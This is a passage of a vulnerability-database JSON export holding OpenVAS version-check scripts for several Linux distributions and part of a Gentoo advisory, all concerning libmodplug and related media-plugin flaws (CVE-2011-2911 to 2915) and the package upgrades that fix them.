\"The remote host is missing updates announced in\nadvisory GLSA 201203-14.\";\n\n \n \nif(description)\n{\n script_id(71300);\n script_cve_id(\"CVE-2011-2911\", \"CVE-2011-2912\", \"CVE-2011-2913\", \"CVE-2011-2914\", \"CVE-2011-2915\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_version(\"$Revision: 6589 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 10:27:50 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-04-30 07:59:57 -0400 (Mon, 30 Apr 2012)\");\n script_name(\"Gentoo Security Advisory GLSA 201203-14 (audacious-plugins)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-gentoo.inc\");\nres = \"\";\nreport = \"\";\nif((res = ispkgvuln(pkg:\"media-plugins/audacious-plugins\", unaffected: make_list(\"ge 3.1\"), vulnerable: make_list(\"lt 3.1\"))) != NULL ) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-01-06T13:07:22", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-2913", "CVE-2011-2912", "CVE-2011-2915", "CVE-2011-2911", "CVE-2011-2914"], "description": "Check for the Version of libmodplug", "modified": "2018-01-05T00:00:00", "published": "2012-03-19T00:00:00", "id": "OPENVAS:863809", "href": "http://plugins.openvas.org/nasl.php?oid=863809", "type": "openvas", "title": "Fedora Update for libmodplug FEDORA-2011-10452", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for libmodplug FEDORA-2011-10452\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"libmodplug on Fedora 16\";\ntag_insight = \"Modplug mod music file format library.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2011-August/064279.html\");\n script_id(863809);\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_version(\"$Revision: 8295 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-05 07:29:18 +0100 (Fri, 05 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-03-19 12:19:03 +0530 (Mon, 19 Mar 2012)\");\n script_cve_id(\"CVE-2011-2911\", \"CVE-2011-2912\", \"CVE-2011-2913\", \"CVE-2011-2914\", \"CVE-2011-2915\");\n script_xref(name: \"FEDORA\", value: \"2011-10452\");\n script_name(\"Fedora Update for libmodplug FEDORA-2011-10452\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of libmodplug\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC16\")\n{\n\n if ((res = isrpmvuln(pkg:\"libmodplug\", rpm:\"libmodplug~0.8.8.4~1.fc16\", rls:\"FC16\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-27T10:55:31", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-2913", "CVE-2011-2912", "CVE-2011-2915", "CVE-2011-2911", "CVE-2011-2914"], "description": "Check for the Version of gstreamer-plugins", "modified": "2017-07-12T00:00:00", "published": "2011-09-12T00:00:00", "id": "OPENVAS:870483", "href": "http://plugins.openvas.org/nasl.php?oid=870483", "type": "openvas", "title": "RedHat Update for gstreamer-plugins RHSA-2011:1264-01", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for gstreamer-plugins RHSA-2011:1264-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The gstreamer-plugins packages contain plug-ins used by the GStreamer\n streaming-media framework to support a wide variety of media formats.\n\n An integer overflow flaw, a boundary error, and multiple off-by-one flaws\n were found in various ModPlug music file format library (libmodplug)\n modules, embedded in GStreamer. An attacker could create specially-crafted\n music files that, when played by a victim, would cause applications using\n GStreamer to crash or, potentially, execute arbitrary code. (CVE-2011-2911,\n CVE-2011-2912, CVE-2011-2913, CVE-2011-2914, CVE-2011-2915)\n \n All users of gstreamer-plugins are advised to upgrade to these updated\n packages, which contain backported patches to correct these issues. After\n installing the update, all applications using GStreamer (such as Rhythmbox)\n must be restarted for the changes to take effect.\";\n\ntag_affected = \"gstreamer-plugins on Red Hat Enterprise Linux AS version 4,\n Red Hat Enterprise Linux ES version 4,\n Red Hat Enterprise Linux WS version 4\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/rhsa-announce/2011-September/msg00004.html\");\n script_id(870483);\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_version(\"$Revision: 6685 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-12 11:44:46 +0200 (Wed, 12 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-09-12 16:29:49 +0200 (Mon, 12 Sep 2011)\");\n script_xref(name: \"RHSA\", value: \"2011:1264-01\");\n script_cve_id(\"CVE-2011-2911\", \"CVE-2011-2912\", \"CVE-2011-2913\", \"CVE-2011-2914\", \"CVE-2011-2915\");\n script_name(\"RedHat Update for gstreamer-plugins RHSA-2011:1264-01\");\n\n script_summary(\"Check for the Version of gstreamer-plugins\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"RHENT_4\")\n{\n\n if ((res = isrpmvuln(pkg:\"gstreamer-plugins\", rpm:\"gstreamer-plugins~0.8.5~1.EL.4\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"gstreamer-plugins-debuginfo\", rpm:\"gstreamer-plugins-debuginfo~0.8.5~1.EL.4\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"gstreamer-plugins-devel\", rpm:\"gstreamer-plugins-devel~0.8.5~1.EL.4\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-12-04T11:27:36", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-2913", "CVE-2011-2912", "CVE-2011-2915", "CVE-2011-2911", "CVE-2011-2914"], "description": "Ubuntu Update for Linux kernel vulnerabilities USN-1255-1", "modified": "2017-12-01T00:00:00", "published": "2011-11-11T00:00:00", "id": "OPENVAS:840800", "href": "http://plugins.openvas.org/nasl.php?oid=840800", "type": "openvas", "title": "Ubuntu Update for libmodplug USN-1255-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_1255_1.nasl 7964 2017-12-01 07:32:11Z santu $\n#\n# Ubuntu Update for libmodplug USN-1255-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Hossein Lotfi discovered that libmodplug did not correctly handle certain\n malformed media files. If a user or automated system were tricked into\n opening a crafted media file, an attacker could cause a denial of service\n or possibly execute arbitrary code with privileges of the user invoking the\n program. (CVE-2011-2911, CVE-2011-2912, CVE-2011-2913)\n\n It was discovered that libmodplug did not correctly handle certain\n malformed media files. If a user or automated system were tricked into\n opening a crafted media file, an attacker could cause a denial of service\n or possibly execute arbitrary code with privileges of the user invoking the\n program. (CVE-2011-2914, CVE-2011-2915)\";\n\ntag_summary = \"Ubuntu Update for Linux kernel vulnerabilities USN-1255-1\";\ntag_affected = \"libmodplug on Ubuntu 11.04 ,\n Ubuntu 10.10 ,\n Ubuntu 10.04 LTS\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\nif(description)\n{\n script_xref(name: \"URL\" , value: \"http://www.ubuntu.com/usn/usn-1255-1/\");\n script_id(840800);\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_version(\"$Revision: 7964 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-01 08:32:11 +0100 (Fri, 01 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-11-11 09:55:33 +0530 (Fri, 11 Nov 2011)\");\n script_xref(name: \"USN\", value: \"1255-1\");\n script_cve_id(\"CVE-2011-2911\", \"CVE-2011-2912\", \"CVE-2011-2913\", \"CVE-2011-2914\", \"CVE-2011-2915\");\n script_name(\"Ubuntu Update for libmodplug USN-1255-1\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\");\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"UBUNTU10.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libmodplug1\", ver:\"1:0.8.8.1-1ubuntu1.3\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU10.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libmodplug0c2\", ver:\"1:0.8.7-1ubuntu0.3\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU11.04\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libmodplug1\", ver:\"1:0.8.8.1-2ubuntu0.3\", rls:\"UBUNTU11.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:39:58", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-2913", "CVE-2011-2912", "CVE-2011-2915", "CVE-2011-2911", "CVE-2011-2914"], "description": "The remote host is missing an update for the ", "modified": "2018-11-23T00:00:00", "published": "2011-09-12T00:00:00", "id": "OPENVAS:1361412562310870483", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310870483", "type": "openvas", "title": "RedHat Update for gstreamer-plugins RHSA-2011:1264-01", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for gstreamer-plugins RHSA-2011:1264-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2011-September/msg00004.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.870483\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_version(\"$Revision: 12497 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-23 09:28:21 +0100 (Fri, 23 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2011-09-12 16:29:49 +0200 (Mon, 12 Sep 2011)\");\n script_xref(name:\"RHSA\", value:\"2011:1264-01\");\n script_cve_id(\"CVE-2011-2911\", \"CVE-2011-2912\", \"CVE-2011-2913\", \"CVE-2011-2914\", \"CVE-2011-2915\");\n script_name(\"RedHat Update for gstreamer-plugins RHSA-2011:1264-01\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'gstreamer-plugins'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_4\");\n script_tag(name:\"affected\", value:\"gstreamer-plugins on Red Hat Enterprise Linux AS version 4,\n Red Hat Enterprise Linux ES version 4,\n Red Hat Enterprise Linux WS version 4\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"insight\", value:\"The gstreamer-plugins packages contain plug-ins used by the GStreamer\n streaming-media framework to support a wide variety of media formats.\n\n An integer overflow flaw, a boundary error, and multiple off-by-one flaws\n were found in various ModPlug music file format library (libmodplug)\n modules, embedded in GStreamer. An attacker could create specially-crafted\n music files that, when played by a victim, would cause applications using\n GStreamer to crash or, potentially, execute arbitrary code. (CVE-2011-2911,\n CVE-2011-2912, CVE-2011-2913, CVE-2011-2914, CVE-2011-2915)\n\n All users of gstreamer-plugins are advised to upgrade to these updated\n packages, which contain backported patches to correct these issues. After\n installing the update, all applications using GStreamer (such as Rhythmbox)\n must be restarted for the changes to take effect.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_4\")\n{\n\n if ((res = isrpmvuln(pkg:\"gstreamer-plugins\", rpm:\"gstreamer-plugins~0.8.5~1.EL.4\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"gstreamer-plugins-debuginfo\", rpm:\"gstreamer-plugins-debuginfo~0.8.5~1.EL.4\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"gstreamer-plugins-devel\", rpm:\"gstreamer-plugins-devel~0.8.5~1.EL.4\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:39:31", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-2913", "CVE-2011-2912", "CVE-2011-2915", "CVE-2011-2911", "CVE-2011-2914"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2011-09-12T00:00:00", "id": "OPENVAS:1361412562310880974", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310880974", "type": "openvas", "title": "CentOS Update for gstreamer-plugins CESA-2011:1264 centos4 i386", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for gstreamer-plugins CESA-2011:1264 centos4 i386\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2011-September/017719.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.880974\");\n script_version(\"$Revision: 14222 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 13:50:48 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2011-09-12 16:29:49 +0200 (Mon, 12 Sep 2011)\");\n script_xref(name:\"CESA\", value:\"2011:1264\");\n script_cve_id(\"CVE-2011-2911\", \"CVE-2011-2912\", \"CVE-2011-2913\", \"CVE-2011-2914\",\n \"CVE-2011-2915\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_name(\"CentOS Update for gstreamer-plugins CESA-2011:1264 centos4 i386\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'gstreamer-plugins'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS4\");\n script_tag(name:\"affected\", value:\"gstreamer-plugins on CentOS 4\");\n script_tag(name:\"insight\", value:\"The gstreamer-plugins packages contain plug-ins used by the GStreamer\n streaming-media framework to support a wide variety of media formats.\n\n An integer overflow flaw, a boundary error, and multiple off-by-one flaws\n were found in various ModPlug music file format library (libmodplug)\n modules, embedded in GStreamer. An attacker could create specially-crafted\n music files that, when played by a victim, would cause applications using\n GStreamer to crash or, potentially, execute arbitrary code. (CVE-2011-2911,\n CVE-2011-2912, CVE-2011-2913, CVE-2011-2914, CVE-2011-2915)\n\n All users of gstreamer-plugins are advised to upgrade to these updated\n packages, which contain backported patches to correct these issues. After\n installing the update, all applications using GStreamer (such as Rhythmbox)\n must be restarted for the changes to take effect.\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS4\")\n{\n\n if ((res = isrpmvuln(pkg:\"gstreamer-plugins\", rpm:\"gstreamer-plugins~0.8.5~1.EL.4\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"gstreamer-plugins-devel\", rpm:\"gstreamer-plugins-devel~0.8.5~1.EL.4\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:38:39", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-2913", "CVE-2011-2912", "CVE-2011-2915", "CVE-2011-2911", "CVE-2011-2914"], "description": "The remote host is missing updates announced in\nadvisory GLSA 201203-14.", "modified": "2018-10-12T00:00:00", "published": "2012-04-30T00:00:00", "id": "OPENVAS:136141256231071300", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231071300", "type": "openvas", "title": "Gentoo Security Advisory GLSA 201203-14 (audacious-plugins)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: glsa_201203_14.nasl 11859 2018-10-12 08:53:01Z cfischer $\n#\n# Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.71300\");\n script_cve_id(\"CVE-2011-2911\", \"CVE-2011-2912\", \"CVE-2011-2913\", \"CVE-2011-2914\", \"CVE-2011-2915\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_version(\"$Revision: 11859 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-12 10:53:01 +0200 (Fri, 12 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-04-30 07:59:57 -0400 (Mon, 30 Apr 2012)\");\n script_name(\"Gentoo Security Advisory GLSA 201203-14 (audacious-plugins)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name:\"insight\", value:\"Multiple vulnerabilities in Audacious Plugins could result in\n execution of arbitrary code or Denial of Service.\");\n script_tag(name:\"solution\", value:\"All Audacious Plugins users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=media-plugins/audacious-plugins-3.1'\");\n\n script_xref(name:\"URL\", value:\"http://www.securityspace.com/smysecure/catid.html?in=GLSA%20201203-14\");\n script_xref(name:\"URL\", value:\"http://bugs.gentoo.org/show_bug.cgi?id=383991\");\n script_tag(name:\"summary\", value:\"The remote host is missing updates announced in\nadvisory GLSA 201203-14.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"pkg-lib-gentoo.inc\");\ninclude(\"revisions-lib.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = ispkgvuln(pkg:\"media-plugins/audacious-plugins\", unaffected: make_list(\"ge 3.1\"), vulnerable: make_list(\"lt 3.1\"))) != NULL ) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "gentoo": [{"lastseen": "2016-09-06T19:46:01", "bulletinFamily": "unix", "cvelist": ["CVE-2011-2913", "CVE-2011-2912", "CVE-2011-1574", "CVE-2011-2915", "CVE-2011-2911", "CVE-2011-2914"], "description": "### Background\n\nModPlug is a library for playing MOD-like music.\n\n### Description\n\nMultiple vulnerabilities have been found in ModPlug:\n\n * The ReadS3M method in load_s3m.cpp fails to validate user-supplied information, which could cause a stack-based buffer overflow (CVE-2011-1574). \n * The \"CSoundFile::ReadWav()\" function in load_wav.cpp contains an integer overflow which could cause a heap-based buffer overflow (CVE-2011-2911). \n * The \"CSoundFile::ReadS3M()\" function in load_s3m.cpp contains multiple boundary errors which could cause a stack-based buffer overflow (CVE-2011-2912). \n * The \"CSoundFile::ReadAMS()\" function in load_ams.cpp contains an off-by-one error which could cause memory corruption (CVE-2011-2913). \n * The \"CSoundFile::ReadDSM()\" function in load_dms.cpp contains an off-by-one error which could cause memory corruption (CVE-2011-2914). \n * The \"CSoundFile::ReadAMS2()\" function in load_ams.cpp contains an off-by-one error which could cause memory corruption (CVE-2011-2915). \n\n### Impact\n\nA remote attacker could entice a user to open a specially crafted media file, possibly resulting in execution of arbitrary code, or a Denial of Service condition. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll ModPlug users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=media-libs/libmodplug-0.8.8.4\"\n \n\nNOTE: This is a legacy GLSA. Updates for all affected architectures are available since August 27, 2011. It is likely that your system is already no longer affected by this issue.", "edition": 1, "modified": "2012-03-16T00:00:00", "published": "2012-03-16T00:00:00", "id": "GLSA-201203-16", "href": "https://security.gentoo.org/glsa/201203-16", "type": "gentoo", "title": "ModPlug: User-assisted execution of arbitrary code", "cvss": {"score": 6.8, "vector": 